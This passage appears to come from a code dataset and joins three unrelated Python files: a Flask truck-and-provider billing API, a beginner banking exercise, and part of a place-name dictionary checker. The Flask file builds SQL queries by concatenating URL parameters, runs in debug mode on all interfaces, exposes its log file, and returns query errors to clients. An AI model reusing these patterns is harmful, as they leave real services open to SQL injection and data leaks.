\"errorDescription\" : \"ERROR EXECUTING QUERY IN DATABASE\" }) , 500\n    try:\n        db.commit()\n        cur.close()\n        db.close()\n        logging.info('[PUT][SUCCESS] provider/') \n        return jsonify({ \"errorCode\" : 0 , \"errorDescription\" : \"status 200 OK\" }) , 200\n    except Exception as e:\n        logging.error('[PUT][FAILURE] provider/') \n        return jsonify({ \"errorCode\" : -1 , \"errorDescription\" : \"500 Internal server error\" }) , 500\n\n# POST /truck\n# registers a truck in the system\n# - provider - known provider id\n# - id - the truck license plate\n# This request needs two arguments.\n# Implementing as a query string in url\n# http://localhost:5000/truck?id=222-33-111&name=new_provider_for_truck\n@app.route('/truck', methods=['POST'])\ndef inserttruck():\n    # get values from query string\n    result_message = \"\"\n    result_count_string = \"\"\n    truck_id = \"\"\n    provider_name = \"\"\n    if request.args.get('id') != None:\n        truck_id = request.args.get('id')\n    else:\n        logging.error('[POST][FAILURE] /truck : USER ERROR : MISSING PARAMETER IN URL QUERY')\n        return jsonify({ \"errorCode\" : -5 , \"errorDescription\" : \"USER ERROR MISSING PARAMETER IN URL QUERY\" }) , 400\n\n    if request.args.get('name'):\n        provider_name = request.args.get('name')\n    else:\n        logging.error('[POST][FAILURE] /truck : USER ERROR : MISSING PARAMETER IN URL QUERY')\n        return jsonify({ \"errorCode\" : -5 , \"errorDescription\" : \"USER ERROR MISSING PARAMETER IN URL QUERY\" }), 400\n    \n    try:\n        db = getMysqlConnection()\n    except:\n        return jsonify({ \"errorCode\" : -2 , \"errorDescription\" : \"ERROR ESTABLISHING A DATABASE CONNECTION\" }) , 503\n    \n    try:\n        cur = db.cursor()\n        # get id of provider (owner of the truck id)\n        querystr = \"SELECT id FROM Provider WHERE name = '\" + provider_name + \"'\"\n        cur.execute(querystr)\n        query_result = 
cur.fetchall()\n        result_count_string = \" Result count: \" + str(cur.rowcount)\n        if cur.rowcount > 0: # test if there is at least one record\n            provider_id = str(query_result[0][0])\n            # count how many records have the desired truck id\n            querystr = \"SELECT COUNT(IF(id='\" + truck_id + \"',1, NULL)) 'id' FROM Trucks\"\n            cur.execute(querystr)\n            query_result = cur.fetchall()\n            if int(query_result[0][0]) > 0: # if more than 0, then don't create the new record.\n                result_message = \"[POST][FAILURE] /truck : Truck no: \" + truck_id + \" already exists! Can't create new truck record with the same id.\"\n                logging.info(result_message)\n                return jsonify({ \"errorCode\" : -5 , \"errorDescription\" : \"status 200 OK\" , \"result\": result_message}) , 200 \n            else: # Truck doesn't exist -> create new record in table\n                querystr = \"INSERT INTO Trucks (`id`,`provider_id`) VALUES ('\" + truck_id + \"', \" + provider_id + \")\"\n                cur.execute(querystr)\n                cur.close()\n                db.close()\n                result_message = \"[POST][SUCCESS] /truck : Added new truck no: \" + truck_id + \" for provider: \" + provider_name\n                logging.info(result_message)\n                return jsonify({ \"errorCode\" : 0 , \"errorDescription\" : \"status 200 OK\" , \"result\": result_message}) , 200 \n        else: # No id of provider (owner of the truck id)\n            result_message = \"No provider with this name: \" + provider_name\n            logging.info(result_message)\n            return jsonify({ \"errorCode\" : -5 , \"errorDescription\" : \"status 200 OK\" , \"result\": result_message}) , 200 \n    except Exception as e:\n        logging.error('[POST][FAILURE] /truck : QUERY:' + querystr +\" == \" + str(e))\n        #return jsonify({ \"errorCode\" : -1 , \"errorDescription\" : \"500 Internal server error\" }) , 500\n        return str(e) + \"\\n\" + querystr\n\n# PUT /truck/{id} can be used to update provider id\n# This request needs two arguments.\n# Implementing as a query string in url\n# http://localhost:5000/truck?id=222-33-111&name=new_provider_for_truck\n@app.route('/truck', methods=[\"PUT\"])\ndef updatetruck():\n    # get values from query string\n    result_message = \"\"\n    result_count_string = \"\"\n    truck_id = \"\"\n    provider_name = \"\"\n    if request.args.get('id') != None:\n        truck_id = request.args.get('id')\n    else:\n        logging.error('[PUT][FAILURE] /truck/ : USER ERROR : MISSING PARAMETER IN URL QUERY')\n        return jsonify({ \"errorCode\" : -5 , \"errorDescription\" : \"USER ERROR MISSING PARAMETER IN URL QUERY\" }) , 400\n\n    if request.args.get('name'):\n        provider_name = request.args.get('name')\n    else:\n        logging.error('[PUT][FAILURE] /truck/ : USER ERROR : MISSING PARAMETER IN URL QUERY')\n        return jsonify({ \"errorCode\" : -5 , \"errorDescription\" : \"USER ERROR MISSING PARAMETER IN URL QUERY\" }) , 400\n    \n    try:\n        db = getMysqlConnection()\n    except:\n        return jsonify({ \"errorCode\" : -2 , \"errorDescription\" : \"ERROR ESTABLISHING A DATABASE CONNECTION\" }) , 503\n    \n    try:\n        cur = db.cursor()\n        # get id of provider (owner of the truck id)\n        querystr = \"SELECT id FROM Provider WHERE name = '\" + provider_name + \"'\"\n        cur.execute(querystr)\n        query_result = cur.fetchall()\n        result_count_string = \" Result count: \" + str(cur.rowcount)\n        if cur.rowcount > 0: # test if there is at least one record\n            provider_id = str(query_result[0][0])\n            # count how many records have the desired truck id\n            querystr = \"SELECT COUNT(IF(id='\" + truck_id + \"',1, NULL)) 'id' FROM Trucks\"\n            cur.execute(querystr)\n            query_result = cur.fetchall()\n            if int(query_result[0][0]) > 0: # if more than 0, then update the record.\n                querystr = 
\"UPDATE Trucks SET provider_id = '\" + provider_id + \"' WHERE id = '\" + truck_id + \"'\" \n cur.execute(querystr)\n db.commit()\n cur.close()\n db.close()\n result_message = \"[PUT][SUCCESS] /truck/ : Updated Truck no: \" + truck_id + \" for provider: \" + provider_name\n logging.info(result_message)\n return jsonify({ \"errorCode\" : 0 , \"errorDescription\" : \"status 200 OK\" , \"result\": result_message}) , 200 \n else:\n result_message = \"No Truck ID with this id: \" + truck_id\n logging.info(result_message)\n return jsonify({ \"errorCode\" : -5 , \"errorDescription\" : \"status 200 OK\" , \"result\": result_message}) , 200 \n else: # No id of provider (owner of the truck id)\n result_message = \"No provider with this name: \" + provider_name\n logging.info(result_message)\n return jsonify({ \"errorCode\" : -5 , \"errorDescription\" : \"status 200 OK\" , \"result\": result_message}) , 200 \n except Exception as e:\n logging.error('[PUT][FAILURE] /truck/ : QUERY:' + querystr)\n return jsonify({ \"errorCode\" : -1 , \"errorDescription\" : \"500 Internal server error\" }) , 500\n\n\n# GET /truck/?from=t1&to=t2\n# - id is the truck license. 404 will be returned if non-existent\n# - t1,t2 - date-time stamps, formatted as yyyymmddhhmmss. server time is assumed.\n# default t1 is \"1st of month at 000000\". default t2 is \"now\". \n# Returns a json:\n# { \"id\": ,\n# \"tara\": , // last known tara in kg\n# \"sessions\": [ ,...] \n#}\n@app.route('/truck/', methods=[\"GET\"]) #?from=t1&to=t2\ndef truckinfo(id):\n try:\n fromm = str(request.args.get('from'))\n to = str(request.args.get('to'))\n resp = requests.get('http://green.develeap.com:8080/item/'+ id +' ?from='+ fromm +'&to='+ to +'')\n json_content = json.dumps(resp.json())\n return '{ \"errorCode\" : 0 , \"errorDescription\" : \"status 200 OK\" , \"data\" :' + str(json_content) + ' }' , 200\n \n #return id\n #return id+str(request.args.get('from')+str(request.args.get('to')))\n #db = getMysqlConnection()\n #cur = db.cursor() \n #cur.execute('SELECT id , provider_id FROM Trucks WHERE id='+'\"' + id + '\"')\n #results = cur.fetchall()\n #return str(results)\n ##HERE WE SHOULD MAKE A REQUEST TO WEIGHT API AND GET WITH THE ID BETWEEN DATES BY ID ?\n #db.commit()\n #cur.close()\n #db.close()\n #logging.info('[GET][SUCCESS] /truck/') # CHANGE TO PROPER MESSAGE\n #tempJson = { \"id\"}\n #return \"OK\"\n except Exception as e:\n logging.error('[GET][FAILURE] /truck/') # CHANGE TO PROPER MESSAGE\n return jsonify({ \"errorCode\" : -1 , \"errorDescription\" : \"500 Internal server error\" }) , 500\n\n\n# POST /rates\n# - file=\n# Will upload new rates from an excel file in \"/in\" folder. Rate excel has the following columns:\n# - Product - a product id\n# - Rate - integer (in agorot)\n# - Scope - ALL or A provider id. 
\n# The new rates over-write the old ones\n# A scoped rate has higher precedence than an \"ALL\" rate\n@app.route(\"/rates\",methods=[\"POST\"])\ndef postrates():\n    #filename = \"./in/rates.xlsx\"\n    try:\n        db = getMysqlConnection()\n    except:\n        return jsonify({ \"errorCode\" : -2 , \"errorDescription\" : \"ERROR ESTABLISHING A DATABASE CONNECTION\" }) , 503\n    try:\n        filename_tmp = request.get_json()\n        filename = str(filename_tmp[\"file\"])\n    except:\n        return jsonify({ \"errorCode\" : -5 , \"errorDescription\" : \"NO PARAMETERS PASSED\" }) , 400\n    \n    try:\n        wb = load_workbook(\"./in/\" + filename)\n    except: \n        return jsonify({ \"errorCode\" : -4 , \"errorDescription\" : \"FILE NOT FOUND\" }) , 500\n    try:\n        ws = wb.get_active_sheet()\n        cur = db.cursor()\n        cur.execute('TRUNCATE TABLE Rates') \n        query = \"INSERT INTO Rates (product_id, rate, scope) VALUES (%s, %s, %s)\" #INSERT\n    except:\n        return jsonify({ \"errorCode\" : -5 , \"errorDescription\" : \"DB ERROR WRONG PARAMETERS PASSED\" }) , 400\n    \n    try: \n        row = 2\n        while ws.cell(row, 1).value is not None:\n            product = ws.cell(row, 1).value\n            rate = ws.cell(row, 2).value\n            scope = ws.cell(row, 3).value\n            i_tuple = (product, rate, scope)\n            cur.execute(query, i_tuple)\n            row += 1\n        db.commit()\n        cur.close()\n        db.close()\n        logging.info('[POST][SUCCESS] /rates ') # CHANGE TO PROPER MESSAGE\n        return jsonify({ \"errorCode\" : 0 , \"errorDescription\" : \"status 200 OK\" }) , 200\n    except Exception as e:\n        logging.error('[POST][FAILURE] /rates') # CHANGE TO PROPER MESSAGE\n        return jsonify({ \"errorCode\" : -1 , \"errorDescription\" : \"500 Internal server error\" }) , 500\n\n\n# GET /rates\n# Will download a copy of the same excel that was uploaded using POST /rates\ndef json_to_excel(ws, data, row=0, col=0):\n    ws.write('A1', 'Product')\n    ws.write('B1', 'Rate')\n    ws.write('C1', 'Scope')\n    row += 1\n    for product_id, rate, scope in data:\n        ws.write(row, col, str(product_id))\n        ws.write(row, col + 1, str(rate))\n        ws.write(row, col + 2, str(scope))\n        row += 1\n\n@app.route('/rates', methods=['GET'])\ndef get_rates():\n    try:\n        db = getMysqlConnection()\n    except:\n        return jsonify({ \"errorCode\" : -2 , \"errorDescription\" : \"ERROR ESTABLISHING A DATABASE CONNECTION\" }) , 503\n    try:\n        sqlstr = \"SELECT * FROM Rates\"\n        cur = db.cursor()\n        cur.execute(sqlstr)\n        output_jason = cur.fetchall()\n        db.close()\n        logging.info(\"[GET][SUCCESS] rates request - : %s\", (sqlstr))\n    except Exception :\n        logging.error(\"[GET][FAILURE] rates request , ON QUERY: %s\", (sqlstr))\n        return jsonify({ \"errorCode\" : -3 , \"errorDescription\" : \"ERROR EXECUTING QUERY IN DATABASE\" }) , 500\n    try: # Create and save Excel file\n        dir_name = \"out\"\n        file_name = \"output.xlsx\"\n        excel_path = \"./\" + dir_name + \"/\" + file_name\n        data = output_jason\n        wb = xlsxwriter.Workbook(excel_path)\n        ws = wb.add_worksheet()\n        json_to_excel(ws, data)\n        wb.close()\n        logging.info(\"[GET][SUCCESS] rates request : Excel file created in: %s\", (excel_path))\n    except:\n        logging.error(\"[GET][FAILURE] rates request : Excel file NOT created in: %s\", (excel_path))\n        return jsonify({ \"errorCode\" : -4 , \"errorDescription\" : \"I/O ERROR : writing Excel file\" }) , 500\n    try: # send excel file as http response\n        if os.path.exists(excel_path):\n            logging.info(\"[GET][SUCCESS] rates request : Excel file from: %s was sent for download\", (excel_path))\n            return send_from_directory(dir_name, filename=file_name, as_attachment=True, attachment_filename=\"Rates.xlsx\", 
mimetype=\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\")\n except:\n logging.error(\"[GET][FAILURE] rates request : Excel file from: %s was NOT sent for download\", (excel_path))\n return jsonify({ \"errorCode\" : -1 , \"errorDescription\" : \"status 404 Not Found : Excel file not found\" }) , 500\n\n# GET /bill/?from=t1&to=t2\n# - id is provider id\n# - t1,t2 - date-time stamps, formatted as yyyymmddhhmmss. server time is assumed.\n# default t1 is \"1st of month at 000000\". default t2 is \"now\". \n# Returns a json:\n# {\n# \"id\": ,\n# \"name\": ,\n# \"from\": ,\n# \"to\": ,\n# \"truckCount\": ,\n# \"sessionCount\": ,\n# \"products\": [\n# { \"product\":,\n# \"count\": , // number of sessions\n# \"amount\": , // total kg\n# \"rate\": , // agorot\n# \"pay\": // agorot\n# },...\n# ],\n# \"total\": // agorot\n# }\n@app.route('/bill/', methods=[\"GET\"])\ndef getbilling(id):\n try:\n # id\n result={\"id\" : id}\n # name\n name1 = bill.get_provider_name(id)\n if name1 == -2:\n return jsonify({ \"errorCode\" : -2 , \"errorDescription\" : \"ERROR ESTABLISHING A DATABASE CONNECTION\" }) , 200\n elif name1 == -3:\n return jsonify({ \"errorCode\" : -3 , \"errorDescription\" : \"ERROR EXECUTING QUERY IN DATABASE\" }) , 200\n elif name1 == None:\n return jsonify({ \"errorCode\" : -1 , \"errorDescription\" : \"provider id not in database\" }) , 500 \n name= bill.get_provider_name(id)[0]\n result.update({\"name\" : name})\n # t1 & t2\n now = datetime.now()\n t1 = now.strftime(\"%Y%m01000000\")\n t2 = now.strftime(\"%Y%m%d%H%M%S\")\n if request.args.get('from')!=None:\n t1 = request.args.get('t1')\n if request.args.get('to')!=None:\n t2 = request.args.get('t2')\n result.update({ \"from\" : t1 })\n result.update({ \"to\" : t2 })\n trucks_list=bill.find_providers_trucks(id)\n if trucks_list == -2:\n return jsonify({ \"errorCode\" : -2 , \"errorDescription\" : \"ERROR ESTABLISHING A DATABASE CONNECTION\" }) , 200\n elif trucks_list == -3:\n return jsonify({ \"errorCode\" : -3 , \"errorDescription\" : \"ERROR EXECUTING QUERY IN DATABASE\" }) , 200 \n weights_list=bill.get_all_sessions_in_array(t1,t2)\n # tests for api \n rates_dictionary=bill.get_rates()\n if rates_dictionary == -2:\n return jsonify({ \"errorCode\" : -2 , \"errorDescription\" : \"ERROR ESTABLISHING A DATABASE CONNECTION\" }) , 200\n elif rates_dictionary == -3:\n return jsonify({ \"errorCode\" : -3 , \"errorDescription\" : \"ERROR EXECUTING QUERY IN DATABASE\" }) , 200 \n \n # sessionCount\n GlobalSessionsCount=0\n # products\n products=[]\n # truck_in_weights\n trucks_in_weights = set()\n # foreach truck - look for its sessions/weights\n for truck in trucks_list:\n truck_number = str(truck[0])\n truck_sessions_count=0\n for weight in weights_list:\n if weight[\"truck\"] == truck_number:\n truck_sessions_count += 1\n GlobalSessionsCount += 1\n trucks_in_weights.add(truck_number)\n # if product exist in products - update it\n flag = False\n for obj in products:\n if weight[\"produce\"]==obj[\"product\"]:\n flag = True\n amount = int(weight[\"neto\"]) + int(obj[\"amount\"])\n count = int(obj[\"count\"]) +1\n pay = amount * int(obj[\"rate\"])\n obj.update({ \"amount\" : amount , \"count\" : count , \"pay\" : pay})\n logging.info('[GET][SUSSECC] /bill/ : product dictinary updated for'+ weight[\"produce\"])\n if flag == False:\n product=dict()\n rate = 0\n for obj in rates_dictionary:\n if obj[\"product_id\"] == weight[\"produce\"]: \n if obj[\"scope\"] == id:\n rate = int(obj[\"rate\"]) \n break\n elif obj[\"scope\"] == 
\"All\" :\n rate = int(obj[\"rate\"]) \n # pay\n pay = int(weight[\"neto\"]) * int(rate)\n product = { \"product\" : weight[\"produce\"] , \"count\" : 1 , \"amount\" : int(weight[\"neto\"]) , \"rate\" : int(rate) , \"pay\" : int(pay) }\n logging.info('[GET][SUSSECC] /bill/ : product dictinary created for'+ weight[\"produce\"])\n products.append(product)\n # return jsonify(products)\n # set total\n total=0\n for obj in products:\n total += int(obj[\"pay\"])\n result.update({ \"truckCount\" : len(trucks_in_weights) , \"sessionCount\" : GlobalSessionsCount , \"products\" : products , \"total\" : total })\n logging.info('[GET][SUSSECC] /bill/ : result dictinary updated with all data')\n \n \n logging.info('[GET][SUCCESS] /bill/ : return result as JSON')\n return jsonify(result) , 200 \n except Exception as e:\n logging.error('[GET][FAILURE] /bill/ : '+ str(e))\n # return jsonify({ \"errorCode\" : -1 , \"errorDescription\" : \"500 Internal server error\" }) , 500 \n return str(e)\n\n\n@app.route('/getlogs', methods=[\"GET\"])\ndef getlogs():\n try:\n with open('app.log', 'r') as file:\n return file.read()\n except Exception as e:\n logging.error('file not found')\n return str(e)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True,host='0.0.0.0')\n","sub_path":"providers/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":22798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"73810471","text":"#transactionsThisMonth is assigned an int\ntransactionsThisMonth = 1\n\n#accountBalance is assigned a float\naccountBalance = 555.55\n\n#firstname, lastname, accountNUmber, and pin are assigned strings\nfirstName = \"Marc\"\nlastName = \"Hauschildt\"\naccountNumber = \"k0519415\"\npin = \"1234\"\n\n# Start writing text \n#active is assigned a boolean\nactive = True\n# Add these lines after the \"active = True\" statement\nPROCESSING_FEE = 2.00\nINTEREST_RATE = 0.019\n\npinInput = str(input(\"What is your pin?\"))\n\n# add the remaining lines after the \"Your account balance is...\" statement\nwithdrawInput = float(input(\"\\nHow much would you like to withdraw? \")) \n\n# Place this code above the \"Rate your experience\" input\nprint(\"\\nThis transaction includes a $\" + format(PROCESSING_FEE, \".2f\"), \"processing fee.\")\naccountBalance = accountBalance - withdrawInput - PROCESSING_FEE\ninterestEarned = accountBalance * (INTEREST_RATE / 12)\nprint(\"Congratulations, your account earned $\" + format(interestEarned, \".2f\"), \"in interest this month.\")\naccountBalance = accountBalance + interestEarned\nprint(\"\\nYour updated account balance is $\" + format(accountBalance, \"5.2f\"))\ntransactionsThisMonth += 1\nprint(\"You have made\", str(transactionsThisMonth), \"transactions this month.\")\n\nratingInput = int(input(\"\\nRate your experience today (1-Bad, 5-Great): \"))\nprint(type(pinInput), type(withdrawInput), type(ratingInput))\n\n# Don't do this when you want to add two numbers. 
The + sign means concatenate when dealing with strings\nnum1 = input(\"Enter a number: \")\nprint(num1)\nnum2 = input(\"Enter another number: \")\nprint(num1 + num2)\n\n# Do this instead\nnum1 = int(input(\"Enter a number: \"))\nnum2 = int(input(\"Enter another number: \"))\nprint(num1 + num2)","sub_path":"chapter2.py","file_name":"chapter2.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"144190562","text":"#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\nimport os\r\nimport sys\r\nimport re\r\nimport codecs\r\nimport pickle\r\nimport cPickle\r\nfrom OffsetDump import KiwiDataManager\r\n\r\n# set log\r\nimport CheckLog\r\nlog = CheckLog.get_file_log('VrDicCheck.log')\r\n\r\n\r\nclass DicItemParamError(Exception): pass\r\n\r\nclass DicItem:\r\n\t_folder = r''\r\n\t_kiwiDataManager = None\r\n\t\"\"\" \"\"\"\r\n\tdef __init__(self, linestr, father):\r\n\t\tself._linestr = linestr\r\n\t\tself._children = None\r\n\t\tself._father = father\r\n\t\tself._kiwiRecord = None\r\n\t\tself._kiwiFrame = None\r\n\t\tself._checked = False\r\n\t\tself._type = None\r\n\t\t# parse attributes from line string\r\n\t\t# 'Name\tPinYin\tNextLevelId\tNextLevelInfo\tOffset VoiceId\tNextLevelNumber'\r\n\t\tpat = re.match( \\\r\n\t\t\t\tr'^(\\S+)\\t([\\w ]+)\\t(0x[\\dA-F]{8})\\t(0x[\\dA-F]{8})\\t(0x[\\dA-F]{8})\\t(0x[\\dA-F]{8})\\t(0x[\\dA-F]{4})\\r\\n$', \\\r\n\t\t\t\tself._linestr)\r\n\t\tif not pat:\r\n\t\t\tlog.warning(r' : %s : %s', self.get_father()['nextLevelId'], self.get_str()[:-2])\r\n\t\t\tlog.warning(r'I try to match pinyin with \"/\"')\r\n\t\t\tpat = re.match( \\\r\n\t\t\t\tr'^(\\S+)\\t([\\w /]+)\\t(0x[\\dA-F]{8})\\t(0x[\\dA-F]{8})\\t(0x[\\dA-F]{8})\\t(0x[\\dA-F]{8})\\t(0x[\\dA-F]{4})\\r\\n$', \\\r\n\t\t\t\tself._linestr)\r\n\t\t\tif pat:\r\n\t\t\t\tlog.warning(r'Try match pinyin with \"/\" successfully')\r\n\t\t\telse:\r\n\t\t\t\tlog.warning(r' : %s : %s', self.get_father()['nextLevelId'], self.get_str())\r\n\t\t# remove '\\r\\n' at the end of each line\r\n\t\tself._linestr = self._linestr[:-2]\r\n\t\tif not pat:\r\n\t\t\tlog.warning(r' : %s : %s', self.get_father()['nextLevelId'], linestr)\r\n\t\t\traise DicItemParamError()\r\n\t\tself._name = pat.group(1)\r\n\t\tself._pinyin = pat.group(2)\r\n\t\tself._nextLevelId = pat.group(3)\r\n\t\tself._nextLevelInfo = pat.group(4)\r\n\t\tself._offset = pat.group(5)\r\n\t\tself._voiceId = pat.group(6)\r\n\t\tself._nextLevelNum = pat.group(7)\r\n\t\tself._attrs = { \r\n\t\t\t\t1: self._name, 'name': self._name,\r\n\t\t\t\t2: self._pinyin, 'pinyin':self._pinyin,\r\n\t\t\t\t3: self._nextLevelId, 'nextLevelId': self._nextLevelId,\r\n\t\t\t\t4: self._nextLevelInfo, 'nextLevelInfo': self._nextLevelInfo,\r\n\t\t\t\t5: self._offset, 'offset': self._offset,\r\n\t\t\t\t6: self._voiceId, 'voiceId': self._voiceId,\r\n\t\t\t\t7: self._nextLevelNum, 'nextLevelNum': self._nextLevelNum\r\n\t\t\t\t}\r\n\r\n\tdef get_str(self):\r\n\t\treturn self._linestr\r\n\t\r\n\tdef check(self):\r\n\t\t\" Check the item itself only. 
\\n\"\r\n\t\tchecker = DicItemChecker(self)\r\n\t\tr = checker.check()\r\n\t\tif r:\r\n\t\t\t#log.debug(r' : %s', self.get_str())\r\n\t\t\tpass\r\n\t\telse:\r\n\t\t\tlog.warning(r' : %s : %s', self.get_father()['nextLevelId'], self.get_str())\r\n\t\treturn (r, checker)\r\n\t\r\n\tdef check_recursively(self):\r\n\t\t\" Check recursively.\\n\"\r\n\t\tif self._checked:\r\n\t\t\treturn True\r\n\t\tself._checked = True\r\n\t\t(result, checker) = self.check()\r\n\t\t# has checked another name of this item, do not to check children\r\n\t\tif checker.checked_another_name():\r\n\t\t\treturn result\r\n\t\t# check children recursively\r\n\t\tfor child in self.get_children():\r\n\t\t\tif not child.check_recursively():\r\n\t\t\t\tresult = False\r\n\t\treturn result\r\n\r\n\tdef has_child(self):\r\n\t\tif self['nextLevelId'] != '0xFFFFFFFF' \\\r\n\t\t\t\tor self['nextLevelInfo'] != '0x00000001' \\\r\n\t\t\t\tor self['nextLevelNum'] != '0x0000':\r\n\t\t\t# check all the info should all say ' has next level'\r\n\t\t\tif not (self['nextLevelId'] != '0xFFFFFFFF' \\\r\n\t\t\t\t\tand self['nextLevelInfo'] != '0x00000001' \\\r\n\t\t\t\t\tand self['nextLevelNum'] != '0x0000'):\r\n\t\t\t\tlog.warning(' : %s : %s', self.get_father()['nextLevelId'], self._linestr)\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\t# check all the info should all say ' not have next level'\r\n\t\t\tif not (self['nextLevelId'] == '0xFFFFFFFF' \\\r\n\t\t\t\t\tand self['nextLevelInfo'] == '0x00000001' \\\r\n\t\t\t\t\tand self['nextLevelNum'] == '0x0000'):\r\n\t\t\t\tlog.warning(' : %s : %s', self.get_father()['nextLevelId'], self._linestr)\r\n\t\t\treturn False\r\n\r\n\tdef get_father(self):\r\n\t\treturn self._father\r\n\r\n\tdef get_children(self):\r\n\t\tif self._children != None:\r\n\t\t\treturn self._children\r\n\t\telif not self.has_child():\r\n\t\t\treturn tuple()\r\n\t\tchildren_set = []\r\n\t\tfilename = self['nextLevelId'][2:]+'.txt'\r\n\t\tfilepath = os.path.join(self._folder, filename)\r\n\t\t# open file and read lines\r\n\t\ttry:\r\n\t\t\tfp = codecs.open(filepath,encoding='gbk')\r\n\t\t\tlines = fp.readlines()\r\n\t\t\tfp.close()\r\n\t\texcept IOError:\r\n\t\t\tlog.warning(r' : %s : %s ', self.get_father()['nextLevelId'], self._linestr)\r\n\t\t\treturn tuple()\r\n\t\texcept UnicodeDecodeError:\r\n\t\t\tlog.warning(r' : %s : %s : %s', self.get_father()['nextLevelId'], self._linestr, filename)\r\n\t\t\tfp.close()\r\n\t\t\treturn tuple()\r\n\t\t# parse each line to a DicItem, and add the DicItems to children_set\r\n\t\tfor s in lines:\r\n\t\t\tif re.match(r'^\\s*$',s):\r\n\t\t\t\tlog.warning(r' : Filename: %s', filename)\r\n\t\t\t\tcontinue\r\n\t\t\ttry:\r\n\t\t\t\tdicItem = DicItem(s, self)\r\n\t\t\texcept DicItemParamError:\r\n\t\t\t\tlog.warning(r' : %s\tFileName : %s', self._linestr, filename)\r\n\t\t\t\tcontinue\r\n\t\t\tchildren_set.append(dicItem)\r\n\t\tself._children = tuple(children_set)\r\n\t\treturn self._children\r\n\r\n\tdef __getitem__(self, attr):\r\n\t\t' Return a string.\\n'\r\n\t\treturn self._attrs[attr]\r\n\r\n\tdef is_root(self):\r\n\t\treturn False\r\n\t\r\n\tdef _fetch_kiwi_record(self):\r\n\t\t# root, process in DicRootItem\r\n\t\t#if self.is_root():\r\n\t\t#\treturn None\r\n\t\tf = self.get_father()\r\n\t\t# root -> province\r\n\t\tif f.is_root():\r\n\t\t\tkiwiRecords = self._kiwiDataManager.fetch_record(self['name'])\r\n\t\t\treturn kiwiRecords\r\n\t\tff = f.get_father()\r\n\t\t# root -> province -> city\r\n\t\tif ff.is_root():\r\n\t\t\tkiwiRecords = self._kiwiDataManager.fetch_record(f['name'], 
self['name'])\r\n\t\t\treturn kiwiRecords\r\n\t\tfff = ff.get_father()\r\n\t\t# root -> province -> city -> town\r\n\t\tif fff.is_root():\r\n\t\t\tkiwiRecords = self._kiwiDataManager.fetch_record(ff['name'], f['name'], self['name'])\r\n\t\t\treturn kiwiRecords\r\n\t\tffff = fff.get_father()\r\n\t\t# root -> province -> city -> town -> road\r\n\t\tif ffff.is_root():\r\n\t\t\tkiwiRecords = self._kiwiDataManager.fetch_record(fff['name'], ff['name'], f['name'], self['name'])\r\n\t\t\treturn kiwiRecords\r\n\t\t# error\r\n\t\traise KeyError()\r\n\t\r\n\tdef fetch_kiwi_record(self):\r\n\t\tif self._kiwiRecord != None:\r\n\t\t\treturn self._kiwiRecord\r\n\t\trds = self._fetch_kiwi_record()\r\n\t\tif len(rds) == 1:\r\n\t\t\treturn rds[0]\r\n\t\tfor r in rds:\r\n\t\t\tif r['offset'] == int(self['offset'], 16):\r\n\t\t\t\tif r['name'] != self['name']:\r\n\t\t\t\t\tlog.error(r' : Same name record error : %s', self.get_str())\r\n\t\t\t\tself._kiwiRecord = r\r\n\t\t\t\treturn r\r\n\t\tlog.warning(r' : %s : %s', self.get_father()['offset'], self['offset'])\r\n\t\traise KeyError()\r\n\t\r\n\tdef fetch_kiwi_frame(self):\r\n\t\tif self._kiwiFrame != None:\r\n\t\t\treturn self._kiwiFrame\r\n\t\t# root, process in DicRootItem\r\n\t\t#if self.is_root():\r\n\t\t#\treturn None\r\n\t\tf = self.get_father()\r\n\t\t# root -> province\r\n\t\tif f.is_root():\r\n\t\t\tself._kiwiFrame = self._kiwiDataManager.fetch_frame(self['name'])\r\n\t\t\treturn self._kiwiFrame\r\n\t\tff = f.get_father()\r\n\t\t# root -> province -> city\r\n\t\tif ff.is_root():\r\n\t\t\tself._kiwiFrame = self._kiwiDataManager.fetch_frame(f['name'], self['name'])\r\n\t\t\treturn self._kiwiFrame\r\n\t\tfff = ff.get_father()\r\n\t\t# root -> province -> city -> town\r\n\t\tif fff.is_root():\r\n\t\t\tself._kiwiFrame = self._kiwiDataManager.fetch_frame(ff['name'], f['name'], self['name'])\r\n\t\t\treturn self._kiwiFrame\r\n\t\tffff = fff.get_father()\r\n\t\t# error\r\n\t\traise KeyError()\r\n\t\r\n\tdef get_type(self):\r\n\t\t\"Return 'Sheng', 'ZhiXiaShi', 'Di', 'Xian', 'QuanYu', 'Lu'\\n\"\r\n\t\tif self._type != None:\r\n\t\t\treturn self._type\r\n\t\tif not self.has_child():\r\n\t\t\tself._type = 'Lu'\r\n\t\t\treturn self._type\r\n\t\tif self.get_father().is_root():\r\n\t\t\tif self['name'] == u'上海市' or self['name'] == u'北京市' or \\\r\n\t\t\t\t\tself['name'] == u'天津市' or self['name'] == u'重庆市':\r\n\t\t\t\tself._type = 'ZhiXiaShi'\r\n\t\t\telse:\r\n\t\t\t\tself._type = 'Sheng'\r\n\t\t\treturn self._type\r\n\t\tif self['name'].endswith(u'全域'):\r\n\t\t\tself._type = 'QuanYu'\r\n\t\t\treturn self._type\r\n\t\tfType = self.get_father().get_type()\r\n\t\tif fType == 'ZhiXiaShi':\r\n\t\t\tself._type = 'Qu'\r\n\t\t\treturn self._type\r\n\t\telif fType == 'Sheng':\r\n\t\t\tif len(self.get_children())==0:\r\n\t\t\t\tlog.error(r' : %s', self.get_str())\r\n\t\t\tif self.get_children()[0].has_child():\r\n\t\t\t\tself._type = 'Di'\r\n\t\t\t\treturn self._type\r\n\t\t\telse:\r\n\t\t\t\tself._type = 'Xian'\r\n\t\t\t\treturn self._type\r\n\t\tself._type = 'Xian'\r\n\t\treturn self._type\r\n\r\n\r\nclass DicRootItem(DicItem):\r\n\tdef __init__(self):\r\n\t\tlinestr = 'China\tNoPinYin\t0x80000001\t0x00000000\t0x00000000\t0x00000000\t0x0000\\r\\n'\r\n\t\tDicItem.__init__(self, linestr, None)\r\n\t\t\r\n\tdef check(self):\r\n\t\tpass\r\n\t\r\n\tdef check_recursively(self):\r\n\t\t\" Check recursively.\\n\"\r\n\t\tif self._checked:\r\n\t\t\treturn True\r\n\t\tself._checked = True\r\n\t\t# check children recursively\r\n\t\tresult = 